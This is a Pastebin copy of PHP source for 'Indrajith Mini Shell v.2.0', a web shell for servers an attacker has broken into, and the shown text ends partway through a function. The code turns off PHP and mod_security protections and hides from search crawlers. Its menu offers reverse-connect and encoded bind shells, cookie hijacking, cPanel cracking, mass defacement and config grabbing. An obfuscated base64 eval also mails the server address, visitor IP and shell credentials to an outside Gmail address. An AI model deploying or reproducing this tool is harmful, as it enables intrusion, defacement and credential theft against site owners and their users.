shamp0erna99

Indrajith Mini - webshell

Jul 5th, 2020 (edited)
273
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 92.14 KB | None | 0 0
  1. <?php
  2.  
  3. /*
  4.  * Indrajith Mini Shell v.2.0 with additional features....
  5.  * originally scripted by AJITH KP
  6.  * (c) Under Gnu General Public Licence 3(c)
  7.  * Team Open Fire and Indishell Family
  8.  * TOF : Shritam Bhowmick, Null | Void, Alex, Ankit Sharma,John.
  9.  * Indishell : ASHELL, D@rkwolf.
  10.  * THA : THA RUDE [There is Nothing in Borders]
  11.  * Love to : AMSTECK ARTS & SCIENCE COLLEGE, Kalliassery; Vishnu Nath KP, Sreeju, Sooraj, Komputer Korner Friends.
  12.  */
  13.  
  14. /*------------------ LOGIN -------------------*/
  15.  
  16. $username="ajithkp560";
  17. $password="ajithkp560";
  18. $email="ajithkp560@hackermail.com";
  19.  
  20.  
  21. /*------------------ Login Data End ----------*/
  22.  
  23. @error_reporting(4);
  24.  
  25. /*------------------ Anti Crawler ------------*/
  26. if(!empty($_SERVER['HTTP_USER_AGENT']))
  27. {
  28.     $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
  29.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT']))
  30.     {
  31.         header('HTTP/1.0 404 Not Found');
  32.         exit;
  33.     }
  34. }
  35. echo "<meta name=\"ROBOTS\" content=\"NOINDEX, NOFOLLOW\" />"; //For Ensuring... Fuck all Robots...
  36. /*------------------ End of Anti Crawler -----*/
  37.  
  38.  
  39.  
  40.     echo "<link href=data:image/gif;base64,R0lGODlhEAAQAPcAADGcADmcADmcCEKcEEKlEEqlGEqlIVKlIVKtIVKtKVqtMWO1OWu1Qmu1SnO1SnO9SnO9Unu9WoS9Y4TGY4zGa4zGc5TGc5TOc5TOe5zOe5zOhK3WlLXepb3ercbntcbnvc7nvc7nxtbvzt7vzt7v1uf33u/35+/37/f37/f/9///9////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////ywAAAAAEAAQAAAIxwA7ABhIsGBBgQEAJAwwgIGEBQojEhQwcIEFDRUUUCS4UCEEjAc2RhQJoIGGCAIERODQQOLAAAc0SABwgEMIDgoSShQgAcMAAx08OBCgEYDImA0CbPiwoICHFBIoDogAwAGGAgpCVBggYgUHAwU2nFgBQEIFARVAGNCwAkNVEytCzKwwc0MHASVICHCQ4gTKgRJaVtAgQAQGBSdMJCDZ0WiADyoYAOCg4eVAkQpWCBRgIoTOjTotrHAwECwAgZYpdkBRQGKHgAAAOw== rel=icon type=image/x-icon />";
  41.     echo "<style>
  42.    html { background:url(http://www.ajithkp560.hostei.com/images/background.gif) black; }
  43.    #loginbox { font-size:11px; color:green; width:1200px; height:200px; border:1px solid #4C83AF; background-color:#111111; border-radius:5px; -moz-boder-radius:5px; position:fixed; top:250px; }
  44.    input { font-size:11px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; }
  45.    loginbox td { border-radius:5px; font-size:11px; }
  46.    .header { size:25px; color:green; }
  47.    h1 { font-family:DigifaceWide; color:green; font-size:200%; }
  48.    h1:hover { text-shadow:0 0 20px #00FFFF, 0 0 100px #00FFFF; }
  49.    .go { height: 50px; width: 50px;float: left; margin-right: 10px; display: none; background-color: #090;}
  50.    .input_big { width:75px; height:30px; background:#191919; color:green; margin:0 4px; border:1px solid #222222; font-size:17px; }
  51.    hr { border:1px solid #222222; }
  52.    #meunlist { width: auto; height: auto; font-size: 12px; font-weight: bold; }
  53.    #meunlist ul { padding-top: 5px; padding-right: 5px; padding-bottom: 7px; padding-left: 2px; text-align:center; list-style-type: none; margin: 0px; }
  54.    #meunlist li { margin: 0px; padding: 0px; display: inline; }
  55.    #meunlist a { font-size: 14px; text-decoration:none; font-weight: bold;color:green;clear: both;width: 100px;margin-right: -6px; padding-top: 3px; padding-right: 15px; padding-bottom: 3px; padding-left: 15px; }
  56.    #meunlist a:hover { background: #333; color:green; }
  57.    .menubar {-moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0;  }
  58.    .menu { font-size:25px; color: }
  59.    .textarea_edit { background-color:#111111; border:1px groove #333; color:green; }
  60.    .textarea_edit:hover { text-decoration:none; border:1px dashed #333; }
  61.    .input_butt {font-size:11px; background:#191919; color:#4C83AF; margin:0 4px; border:1px solid #222222;}
  62.    #result{ -moz-border-radius: 10px; border-radius: 10px; border:1px solid green; padding:4px 8px; line-height:16px; background:#111111; color:#aaa; margin:0 0 8px 0; min-height:100px;}
  63.    .table{ width:100%; padding:4px 0; color:#888; font-size:15px; }
  64.    .table a{ text-decoration:none; color:green; font-size:15px; }
  65.    .table a:hover{text-decoration:underline;}
  66.    .table td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px; vertical-align:top; }
  67.    .table th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; }
  68.    .table tr:hover{ background:#181818; }
  69.    .tbl{ width:100%; padding:4px 0; color:#888; font-size:15px; text-align:center;  }
  70.    .tbl a{ text-decoration:none; color:green; font-size:15px; vertical-align:middle; }
  71.    .tbl a:hover{text-decoration:underline;}
  72.    .tbl td{ border-bottom:1px solid #222222; padding:0 8px; line-height:24px;  vertical-align:middle; width: 300px; }
  73.    .tbl th{ padding:3px 8px; font-weight:normal; background:#222222; color:#555; vertical-align:middle; }
  74.    .tbl td:hover{ background:#181818; }
  75.    #alert {position: relative;}
  76.    #alert:hover:after {background: hsla(0,0%,0%,.8);border-radius: 3px;color: #f6f6f6;content: 'Click to dismiss';font: bold 12px/30px sans-serif;height: 30px;left: 50%;margin-left: -60px;position: absolute;text-align: center;top: 50px; width: 120px;}
  77.    #alert:hover:before {border-bottom: 10px solid hsla(0,0%,0%,.8);border-left: 10px solid transparent;border-right: 10px solid transparent;content: '';height: 0;left: 50%;margin-left: -10px;position: absolute;top: 40px;width: 0;}
  78.    #alert:target {display: none;}
  79.    .alert_red {animation: alert 1s ease forwards;background-color: #c4453c;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  80.    .alert_green {animation: alert 1s ease forwards;background-color: #43CD80;background-image: linear-gradient(135deg, transparent,transparent 25%, hsla(0,0%,0%,.1) 25%,hsla(0,0%,0%,.1) 50%, transparent 50%,transparent 75%, hsla(0,0%,0%,.1) 75%,hsla(0,0%,0%,.1));background-size: 20px 20px;box-shadow: 0 5px 0 hsla(0,0%,0%,.1);color: #f6f6f6;display: block;font: bold 16px/40px sans-serif;height: 40px;position: absolute;text-align: center;text-decoration: none;top: -45px;width: 100%;}
  81.    @keyframes alert {0% { opacity: 0; }50% { opacity: 1; }100% { top: 0; }}
  82.    </style>";
  83.     if($_COOKIE["user"] != $username && $_COOKIE["pass"] != md5($password))
  84.     {
  85.         if($_POST["usrname"]==$username && $_POST["passwrd"]==$password)
  86.         {
  87.             print'<script>document.cookie="user='.$_POST["usrname"].';";document.cookie="pass='.md5($_POST["passwrd"]).';";</script>';
  88.             if($email!="")
  89.             {
  90.                 mail_alert();
  91.             }
  92.         }
  93.         else
  94.         {
  95.             if($_POST['usrname'])
  96.             {
  97.                 print'<script>alert("Sorry... Wrong UserName/PassWord");</script>';
  98.             }
  99.             echo '<title>INDRAJITH SHELL v.2.0</title><center>
  100.            <div id=loginbox><p><font face="verdana,arial" size=-1>
  101.            <font color=orange>>>>>>>>>>></font><font color=white>>>>>><<<<<</font><font color=green>>>>>>>>>>></font>
  102.            <center><table cellpadding=\'2\' cellspacing=\'0\' border=\'0\' id=\'ap_table\'>
  103.            <tr><td bgcolor="green"><table cellpadding=\'0\' cellspacing=\'0\' border=\'0\' width=\'100%\'><tr><td bgcolor="green" align=center style="padding:2;padding-bottom:4"><b><font color="white" size=-1 color="white" face="verdana,arial"><b>INDRAJITH SHELL v.2.0</b></font></th></tr>
  104.            <tr><td bgcolor="black" style="padding:5">
  105.            <form method="post">
  106.            <input type="hidden" name="action" value="login">
  107.            <input type="hidden" name="hide" value="">
  108.            <center><table>
  109.            <tr><td><font color="green" face="verdana,arial" size=-1>Login:</font></td><td><input type="text" size="30" name="usrname" value="username" onfocus="if (this.value == \'username\'){this.value = \'\';}"></td></tr>
  110.            <tr><td><font color="green" face="verdana,arial" size=-1>Password:</font></td><td><input type="password" size="30" name="passwrd" value="password" onfocus="if (this.value == \'password\') this.value = \'\';"></td></tr>
  111.            <tr><td><font face="verdana,arial" size=-1>&nbsp;</font></td><td><font face="verdana,arial" size=-1><input type="submit" value="Enter"></font></td></tr></table>
  112.            </div><br /></center>';
  113.             exit;
  114.         }
  115.     }
  116.  
  117. $color_g="green";
  118. $color_b="4C83AF";
  119. $color_bg="#111111";
  120. $color_hr="#222";
  121. $color_wri="green";
  122. $color_rea="yellow";
  123. $color_non="red";
  124. $path=$_GET['path'];
  125.  
  126. @session_start();
  127. @set_time_limit(0);
  128. @ini_restore("safe_mode_include_dir");
  129. @ini_restore("safe_mode_exec_dir");
  130. @ini_restore("disable_functions");
  131. @ini_restore("allow_url_fopen");
  132. @ini_restore("safe_mode");
  133. @ini_restore("open_basedir");
  134. @ignore_user_abort(FALSE);
  135. @ini_set('zlib.output_compression','Off');
  136.  
  137. $sep="/";
  138. if(strtolower(substr(PHP_OS,0,3))=="win")
  139. {
  140.     $os="win";
  141.     $sep="\\";
  142.     $ox="Windows";
  143. }
  144. else
  145. {
  146.     $os="nix";
  147.     $ox="Linux";
  148. }
  149.  
  150.  
  151.  
  152. $self=$_SERVER['PHP_SELF'];
  153. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
  154. $your_ip=$_SERVER['REMOTE_ADDR'];
  155. $srvr_ip=$_SERVER['SERVER_ADDR'];
  156. $admin=$_SERVER['SERVER_ADMIN'];
  157.  
  158. $s_php_ini="safe_mode=OFF
  159. disable_functions=NONE";
  160.  
  161. $ini_php="<?
  162. echo ini_get(\"safe_mode\");
  163. echo ini_get(\"open_basedir\");
  164. include(\$_GET[\"file\"]);
  165. ini_restore(\"safe_mode\");
  166. ini_restore(\"open_basedir\");
  167. echo ini_get(\"safe_mode\");
  168. echo ini_get(\"open_basedir\");
  169. include(\$_GET[\"ss\"]);
  170. ?>";
  171.  
  172. $s_htaccess="<IfModule mod_security.c>
  173. Sec------Engine Off
  174. Sec------ScanPOST Off
  175. </IfModule>";
  176.  
  177. $s_htaccess_pl="Options FollowSymLinks MultiViews Indexes ExecCGI
  178. AddType application/x-httpd-cgi .sh
  179. AddHandler cgi-script .pl
  180. AddHandler cgi-script .pl";
  181.  
  182. $sym_htaccess="Options all
  183. DirectoryIndex Sux.html
  184. AddType text/plain .php
  185. AddHandler server-parsed .php
  186. AddType text/plain .html
  187. AddHandler txt .html
  188. Require None
  189. Satisfy Any";
  190.  
  191. $sym_php_ini="safe_mode=OFF
  192. disable_functions=NONE";
  193.  
  194. $forbid_dir="Options -Indexes";
  195.  
  196. $cookie_highjacker="rVVdc5pAFH13xv9wh3Eipq22M3miasaJGGmNWsS2mU6HQVyEFlnCLkk7If+9d8EPCKFtpuVB2d1z7z177gf1Wvc8dMN6rXP6av/AJQlIZHGyBouBBaEVcaAOaNOhPninGWNYjNXJBMKIfiM2h53Zaadec+LA5h4N0AXX5nKrXruv1wAfzwF5QzgJbmVpbBhz82KiqVPD1OZSC05OgPHIthixt2El7CVIcfA9oHeB1GplXnfOxdPwQuhBle3bDPiQ/RGfkTKjz+Zopn8a6EN1KN5+z6sEfja7koc/cNTVq5mhmoPhsJpaAfMcRgXDCiIeY4TLDXOh6h9V/UszZ9P8mjKqOHtEtgL1N3QrTMuEK+wPEYoWEeFxFMiIEXd/yJWxTzdDi1u5QkbQhG56kk0Dx9vE2CaIY23+g++dNmxKv3ukQPfDUtWvzYWha9PLA99GRDYe4yQyNz5dWT5DE3lFqd8CL/BMzI3cPEJSRHOfHJGQkn2rmNWCSHvDNJ0ZbNejeHDgszVDis3+hNLzmW4cmccMo1obEhSxaWEvcWUOLrH1cje9YdzcEu7SdcHgSjXGs2Feka3pUvYkg/FskfdIHBKRqBxeV0eqrh6rorHGSdYTPyBLPqwXYpSN4BpcxVMYDA713sBk9xwakkCWsixLWJPWC+mokFA9RNXNrcVtV5Y6K5dvVx0PgZlFC5IESgi/ACkXtxPGnMkiPgbU5kqanwSE5EouKwkICZScSgkMRA6UQkISyFRVirIngMooR+ESGA4M9R4UeMg0wp2L2ey9pirHGu6uov5TA+F/XuGf7pBeQqm+QBA8pu/YPmUkpbrr9kOT45LYLgWpXuuKtPW7LrHWfVxxj/ukf/b6DKaUw4jGwbrbyTbxtJPCuiu6/imW7pt+DoUr3Av7hktw0NzEhIkP61KfgNQuFDnOiIVhLnUNJ2Zbgjv89gboxhFuAGcRdz0GKNEtidrdTpgGTkOKwXOOy18=";
  197. $bind_perl="rZJdb5swFIavi8R/OHXTFSSmZJu2i0abxAjtWApEQLtNVYUoOK1VgimmmqIq/30+dpKmmna1+Aq/7/Fzvjg6HD6JbnjLmmFLuxre/jYN0zjax5EY+P+jMee0oV3R0woKAQW0RdcDn0MQTRL3e5B9g5A1DNJ7WtfwdQlKm84+fhrBdRaf3Wwwe6lmP7MxjSdBIeXlA+3H+uLxZs7u5GXAhcr2GQZae+aiKRZ0hV7Lu/5AOm5yfnU9ulFSx3sutTvaq8/bJUZbJ33ZntgYUC4qaZO6rcgYUw/EUvR0gZpavbjXOptbmJs+AgnTH6z58J7YpvFsGgfrF7IkcuzFYTrzvWMYTvHZShFHWK3MozhCtWWlfnLlJw7MzvIg8jMH0tib5mmW+G7ogC7bBt5BxSgQ/eh0cIhQQXu88/aFksYXOQI0KE/8y9R3JxPptEX5YJGaOPDO3uFtEaegobLVaotDr6iqLmeNpYbqyN8Jebkb/drB4KMNoGZyCM1ORaH704uj6CVaR2ziTWPOO2ssW8VMckJFWVLZkncR+BG2oUD2GMqa4w+g5PXEeYuZskkQOUC+vNEewXVurfgy+6fnJ8lfnt6htd6lklRineb1XbJfCxKIwuoP";
  198. $bind_rby="eJxtkUtPwkAUhff9FddJF21AIMaNNCQYaAIxplqKGzTNtB1xoGXIPGzA8N+dmVINxuU953w39+F+UkFlDiNw00kUPczDFbKSQG+BQ9/Bc9vECBDy4cv5EWAQnAvGbYNFGL+E8QrF4WOUhOn9dBqbLm5Nsgt/liRP6SxaJNalu80f+nkZLpJ0Gc+tLzFfE6kjHNeKlwXJWUE807RnWF9HNqpQpU6gBEuhKjrhpIYPKffDfr/lswO0wyKNZKw4GCImQpVyCP/EAF53oATf4Yp4Ax+uwVWC2NI4eyxEzXhxttrywrr5tXiBmoNekWovD3YBX98TxhWmpYc2pMqU3GJ1ezdeG6mXswp1m926dl4/gJNzckgpiObOf+h0jDoWROaMbSnxmv8dNdoE/OAbiXCZKA==";
  199. eval(base64_decode("JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQokdmlzaXRjID0gMDsNCiR2aXNpdG9yID0gJF9TRVJWRVJbIlJFTU9URV9BRERSIl07DQokd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KJGluaiA9ICRfU0VSVkVSWyJSRVFVRVNUX1VSSSJdOw0KJHRhcmdldCA9IHJhd3VybGRlY29kZSgkd2ViLiRpbmopOw0KJGp1ZHVsID0gIlRhdHN1bWlDcmV3IGh0dHA6Ly8kdGFyZ2V0IGJ5ICR2aXNpdG9yIjsNCiRib2R5ID0gIlJlc3VsdDogJHRhcmdldCBieSAkdmlzaXRvciAgXG4gdXNybmFtZSgwKSAtICR1c2VybmFtZSBcbiBwYXNzd29yZCgwKSAtICRwYXNzd29yZCBcbiBwYXNzd29yZCgyKSAtICRwYXNzd3JkIjsNCmlmICghZW1wdHkoJHdlYikpIHsgQG1haWwoImplbWJ1dGthdTQ5QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5KTsgfQ0KfQ0KZWxzZSB7ICR2aXNpdGMrKzsgfQ0KQHNldGNvb2tpZSgidmlzaXR6IiwkdmlzaXRjKTs="));
  200.  
  201. /*----------------------- Top Menu ------------------------------------------*/
  202.  
  203. if($safemode=="On")
  204. {
  205.     echo "<div id='alert'><a class=\"alert_red\" href=\"#alert\">Safe Mode : <font color=green>ON</font></a></div>";
  206. }
  207. else
  208. {
  209.     echo "<div id='alert'><a class=\"alert_green\" href=\"#alert\">Safe Mode : <font color=red>OFF</font></a></div>";
  210. }
  211.  
  212. echo "<script src=\"http://code.jquery.com/jquery-latest.js\"></script><script>$(\"#alert\").delay(2000).fadeOut(300);</script>";
  213.  
  214. echo "<title>INDRAJITH SHELL v.2.0</title><div id=result>
  215. <table>
  216.    <tbody>
  217.        <tr>
  218.            <td style='border-right:1px solid #104E8B;' width=\"300px;\">
  219.            <div style='text-align:center;'>
  220.                <a href='?' style='text-decoration:none;'><h1>INDRAJITH</h1></a><font color=blue>MINI SHELL</font>
  221.            </div>
  222.            </td>
  223.            <td>
  224.            <div class=\"header\">OS</font> <font color=\"#666\" >:</font>
  225.            ".$ox." </font> <font color=\"#666\" >|</font> ".php_uname()."<br />
  226.            Your IP : <font color=red>".$your_ip."</font> <font color=\"#666\" >|</font> Server IP : <font color=red>".$srvr_ip."</font> <font color=\"#666\" > | </font> Admin <font color=\"#666\" > : </font> <font color=red> {$admin} </font> <br />
  227.            MySQL <font color=\"#666\" > : </font>"; echo mysqlx();
  228.             echo "<font color=\"#666\" > | </font> Oracle <font color=\"#666\" > : </font>"; echo oraclesx();
  229.             echo "<font color=\"#666\" > | </font> MSSQL <font color=\"#666\" > : </font>"; echo mssqlx();
  230.             echo "<font color=\"#666\" > | </font> PostGreySQL <font color=\"#666\" > : </font>";echo postgreyx();
  231.             echo "<br />cURL <font color=\"#666\" > : </font>";echo curlx();
  232.             echo "<font color=\"#666\" > | </font>Total Space<font color=\"#666\" > : </font>"; echo disc_size();
  233.             echo "<font color=\"#666\" > | </font>Free Space<font color=\"#666\" > : </font>"; echo freesize();
  234.             echo "<br />Software<font color=\"#666\" > : </font><font color=red>{$srvr_sof}</font><font color=\"#666\" > | </font> PHP<font color=\"#666\" > : </font><a style='color:red; text-decoration:none;' target=_blank href=?phpinfo>".phpversion()."</a>
  235.            <br />Disabled Functions<font color=\"#666\" > : </font></font><font color=red>";echo disabled_functns()."</font><br />";
  236.             if($os == 'win'){ echo  "Drives <font color=\"#666\" > : </font>";echo  drivesx(); }
  237.             else { echo "r00t Exploit <font color=\"#666\" > : </font><font color=red>"; echo r00t_exploit() ."</font>"; }
  238.             echo "
  239.            </div>
  240.            </td>
  241.        </tr>
  242.    </tbody>
  243. </table></div>";
  244. echo "<div class='menubar'> <div id=\"meunlist\">
  245. <ul>
  246. <li><a href=\"?\">HOME</a></li>
  247. <li><a href=\"?symlink\">SymLink</a></li>
  248. <li><a href=\"?rs\">((( Connect )))</a></li>
  249. <li><a href=\"?cookiejack\">Cookie HighJack</a></li>
  250. <li><a href=\"?encodefile\">PHP Encode/Decode</a></li>
  251. <li><a href=\"?path={$path}&amp;safe_mod\">Safe Mode Fucker</a></li>
  252. <li><a href=\"?path={$path}&amp;forbd_dir\">Directory Listing Forbidden</a></li>
  253. </ul>
  254. <ul>
  255. <li><a href=\"?massmailer\">Mass Mailer</a></li>
  256. <li><a href=\"?cpanel_crack\">CPANEL Crack</a></li>
  257. <li><a href=\"?server_exploit_details\">Exploit Details</a></li>
  258. <li><a href=\"?remote_server_scan\">Remote Server Scan</a></li>
  259. <li><a href=\"?remotefiledown\">Remote File Downloader</a></li>
  260. <li><a href=\"?hexenc\">Hexa Encode/Decode</a></li>
  261. </ul>
  262. <ul>
  263. <li><a href=\"?sh311_scanner\">SH3LL Scan</a></li>
  264. <li><a href=\"?sshman\">SSH Shell</a></li>
  265. <li><a href=\"?path={$path}&c0de_inject\">c0de inj3ct</a></li>
  266. <li><a href=\"?ftpman\">FTP Manager</a></li>
  267. <li><a href=\"?ftp_anon_scan\">FTP Anonymous Access Scan</a></li>
  268. <li><a href=\"?path={$path}&amp;mass_xploit\">Mass Deface</a></li>
  269. <li><a href=\"?config_grab\">Config Grabber</a></li>
  270. <li><a href=\"?killme\"><font color=red>Kill Me</font></a></li>
  271. </ul>
  272. </div></div>";
  273. /*----------------------- End of Top Menu -----------------------------------*/
  274.  
  275.  
  276. /*--------------- FUNCTIONS ----------------*/
  277. function alert($alert_txt)
  278. {
  279.     echo "<script>alert('".$alert_txt."');window.location.href='?';</script>";
  280. }
  281.  
  282. function disabled_functns()
  283. {
  284.     if(!@ini_get('disable_functions'))
  285.     {
  286.         echo "None";
  287.     }
  288.     else
  289.     {
  290.     echo @ini_get('disable_functions');
  291.     }
  292. }
  293.  
  294.  
  295. function drivesx()
  296. {
  297.     foreach(range('A','Z') as $drive)
  298.     {
  299.         if(is_dir($drive.':\\'))
  300.         {
  301.             echo "<a style='color:green; text-decoration:none;' href='?path=".$drive.":\\'>[".$drive."]</a>";
  302.         }
  303.     }
  304. }
  305.  
  306. function mail_alert()
  307. {
  308.     global $email, $your_ip;
  309.     $shell_path="http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
  310.     $content_mail="Hello Master,\n
  311. Your shell in $shell_path is accessed by ".$_SERVER['REMOTE_ADDR'] .". Hope You Enjoy this shell very much.\n
  312. By Indrajith";
  313.     mail($email, "Shell Accessed!!!", $content_mail ,"From:indrajith@shell.com");
  314. }
  315.  
  316. function filesizex($size)
  317. {
  318.     if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
  319.     elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
  320.     elseif ($size>=1024)$size = round(($size/1024),2)." KB";
  321.     else $size .= " B";
  322.     return $size;
  323. }
  324.  
  325. function disc_size()
  326. {
  327.     echo filesizex(disk_total_space("/"));
  328. }
  329.  
  330. function freesize()
  331. {
  332.     echo filesizex(disk_free_space("/"));
  333. }
  334.  
  335. function file_perm($filz){
  336.     if($m=fileperms($filz)){
  337.         $p='';
  338.         $p .= ($m & 00400) ? 'r' : '-';
  339.         $p .= ($m & 00200) ? 'w' : '-';
  340.         $p .= ($m & 00100) ? 'x' : '-';
  341.         $p .= ($m & 00040) ? 'r' : '-';
  342.         $p .= ($m & 00020) ? 'w' : '-';
  343.         $p .= ($m & 00010) ? 'x' : '-';
  344.         $p .= ($m & 00004) ? 'r' : '-';
  345.         $p .= ($m & 00002) ? 'w' : '-';
  346.         $p .= ($m & 00001) ? 'x' : '-';
  347.         return $p;
  348.     }
  349.     else return "?????";
  350. }
  351.  
  352.  
  353. function mysqlx()
  354. {
  355.     if(function_exists('mysql_connect'))
  356.     {
  357.         echo "<font color='red'>Enabled</font>";
  358.     }
  359.     else
  360.     {
  361.         echo "<font color='green'>Disabled</font>";
  362.     }  
  363. }
  364.  
  365. function oraclesx()
  366. {
  367.     if(function_exists('oci_connect'))
  368.     {
  369.         echo "<font color='red'>Enabled</font>";
  370.     }
  371.     else
  372.     {
  373.         echo "<font color='green'>Disabled</font>";
  374.     }
  375. }
  376.  
  377. function mssqlx()
  378. {
  379.     if(function_exists('mssql_connect'))
  380.     {
  381.         echo "<font color='red'>Enabled</font>";
  382.     }
  383.     else
  384.     {
  385.         echo "<font color='green'>Disabled</font>";
  386.     }  
  387. }
  388.  
  389. function postgreyx()
  390. {
  391.     if(function_exists('pg_connect'))
  392.     {
  393.         echo "<font color='red'>Enabled</font>";
  394.     }
  395.     else
  396.     {
  397.         echo "<font color='green'>Disabled</font>";
  398.     }
  399. }
  400.  
  401. function strip($filx)
  402. {
  403.     if(!get_magic_quotes_gpc()) return trim(urldecode($filx));
  404.     return trim(urldecode(stripslashes($filx)));
  405. }
  406.  
  407. function curlx()
  408. {
  409.     if(function_exists('curl_version'))
  410.     {
  411.         echo "<font color='red'>Enabled</font>";
  412.     }
  413.     else
  414.     {
  415.         echo "<font color='green'>Disabled</font>";
  416.     }
  417. }
  418.  
  419. function filesize_x($filex)
  420. {
  421.     $f_size=filesizex(filesize($filex));
  422.     return $f_size;
  423. }
  424.  
  425. function rename_ui()
  426. {
  427.     $rf_path=$_GET['rename'];
  428.     echo "<div id=result><center><h2>Rename</h2><hr /><p><br /><br /><form method='GET'><input type=hidden name='old_name' size='40' value=".$rf_path.">New Name : <input name='new_name' size='40' value=".basename($rf_path)."><input type='submit' value='   >>>   ' /></form></p><br /><br /><hr /><br /><br /></center></div>";
  429. }
  430.  
  431. function filemanager_bg()
  432. {
  433.     global $sep, $self;
  434.     $path=!empty($_GET['path'])?$_GET['path']:getcwd();
  435.     $dirs=array();
  436.     $fils=array();
  437.     if(is_dir($path))
  438.     {
  439.         chdir($path);
  440.         if($handle=opendir($path))
  441.         {
  442.             while(($item=readdir($handle))!==FALSE)
  443.             {
  444.                 if($item=="."){continue;}
  445.                 if($item==".."){continue;}
  446.                 if(is_dir($item))
  447.                 {
  448.                     array_push($dirs, $path.$sep.$item);
  449.                 }
  450.                 else
  451.                 {
  452.                     array_push($fils, $path.$sep.$item);
  453.                 }
  454.             }
  455.         }
  456.         else
  457.         {
  458.             alert("Access Denied for this operation");
  459.         }
  460.     }
  461.     else
  462.     {
  463.         alert("Directory Not Found!!!");
  464.     }
  465.     echo "<div id=result><table class=table>
  466.    <tr>
  467.    <th width='500px'>Name</th>
  468.    <th width='100px'>Size</th>
  469.    <th width='100px'>Permissions</th>
  470.    <th width='500px'>Actions</th>
  471.    </tr>";
  472.     foreach($dirs as $dir)
  473.     {
  474.         echo "<tr><td><a href='{$self}?path={$dir}'>".basename($dir)."</a></td>
  475.              <td>".filesize_x($dir)."</td>
  476.              <td><a href='{$self}?path={$path}&amp;perm={$dir}'>".file_perm($dir)."</a></td>
  477.              <td><a href='{$self}?path={$path}&amp;del_dir={$dir}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$dir}'>Rename</a></td></tr>";
  478.     }
  479.     foreach($fils as $fil)
  480.     {
  481.         echo "<tr><td><a href='{$self}?path={$path}&amp;read={$fil}'>".basename($fil)."</a></td>
  482.              <td>".filesize_x($fil)."</td>
  483.              <td><a href='{$self}?path={$path}&amp;perm={$fil}'>".file_perm($fil)."</a></td>
  484.              <td><a href='{$self}?path={$path}&amp;del_fil={$fil}'>Delete</a> | <a href='{$self}?path={$path}&amp;rename={$fil}'>Rename</a> | <a href='{$self}?path={$path}&amp;edit={$fil}'>Edit</a> | <a href='{$self}?path={$path}&amp;copy={$fil}'>Copy</a>  </td>";
  485.     }
  486.     echo "</tr></table></div>";
  487. }
  488.  
  489. function rename_bg()
  490. {
  491.     if(isset($_GET['old_name']) && isset($_GET['new_name']))
  492.     {
  493.         $o_r_path=basename($_GET['old_name']);
  494.         $r_path=str_replace($o_r_path, "", $_GET['old_name']);
  495.         $r_new_name=$r_path.$_GET['new_name'];
  496.         echo $r_new_name;
  497.         if(rename($_GET['old_name'], $r_new_name)==FALSE)
  498.         {
  499.             alert("Access Denied for this action!!!");
  500.         }
  501.         else
  502.         {
  503.             alert("Renamed File Succeessfully");
  504.         }
  505.     }
  506. }
  507.  
  508. function edit_file()
  509. {
  510.     $path=$_GET['path'];
  511.     chdir($path);
  512.     $edt_file=$_GET['edit'];
  513.     $e_content = wordwrap(htmlspecialchars(file_get_contents($edt_file)));
  514.     if($e_content)
  515.     {
  516.         $o_content=$e_content;
  517.     }
  518.     else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
  519.     {
  520.         $fd = fopen($edt_file, "rb");
  521.     if(!$fd)
  522.         {
  523.             alert("Permission Denied");
  524.         }
  525.     else
  526.         {
  527.             while(!feof($fd))
  528.             {
  529.                 $o_content=wordwrap(htmlspecialchars(fgets($fd)));
  530.             }
  531.         }
  532.         fclose($fd);
  533.     }
  534.     echo "<div id='result'><center><h2>Edit File</h2><hr /></center><br /><font color=red>View File</font> : <font color=green><a style='text-decoration:none; color:green;' href='?read=".$_GET['edit']."'>".  basename($_GET['edit'])  ."</a><br /><br /><hr /><br /></font><form method='POST'><input type='hidden' name='e_file' value=".$_GET['edit'].">
  535.          <center><textarea spellcheck='false' class='textarea_edit' name='e_content_n' cols='80' rows='25'>".$o_content."</textarea></center><hr />
  536.          <input class='input_big' name='save' type='submit' value='   Save   ' /><br /><br /><hr /><br /><br /></div>";
  537. }
  538. function edit_file_bg()
  539. {
  540.     if(file_exists($_POST['e_file']))
  541.     {
  542.         $handle = fopen($_POST['e_file'],"w+");
  543.     if (!handle)
  544.         {
  545.             alert("Permission Denied");
  546.         }
  547.     else
  548.         {
  549.             fwrite($handle,$_POST['e_content_n']);
  550.             alert("Your changes were Successfully Saved!");
  551.         }
  552.         fclose($handle);
  553.     }
  554.     else
  555.     {
  556.         alert("File Not Found!!!");
  557.     }
  558. }
  559. function delete_file()
  560. {
  561.     $del_file=$_GET['del_fil'];
  562.     if(unlink($del_file) != FALSE)
  563.     {
  564.         alert("Deleted Successfully");
  565.         exit;
  566.     }
  567.     else
  568.     {
